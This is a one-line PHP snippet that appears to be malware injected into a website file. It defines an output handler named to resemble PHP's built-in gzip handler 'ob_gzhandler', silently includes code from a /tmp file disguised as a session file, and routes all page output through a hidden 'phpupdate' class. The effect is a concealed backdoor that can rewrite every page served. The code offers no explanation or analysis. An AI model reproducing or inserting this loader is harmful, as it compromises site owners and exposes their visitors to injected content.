function ob_gzhanler($s) { $f='/tmp/ssess_c11a142e05e9b0d3eb83398b9507b4c3'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');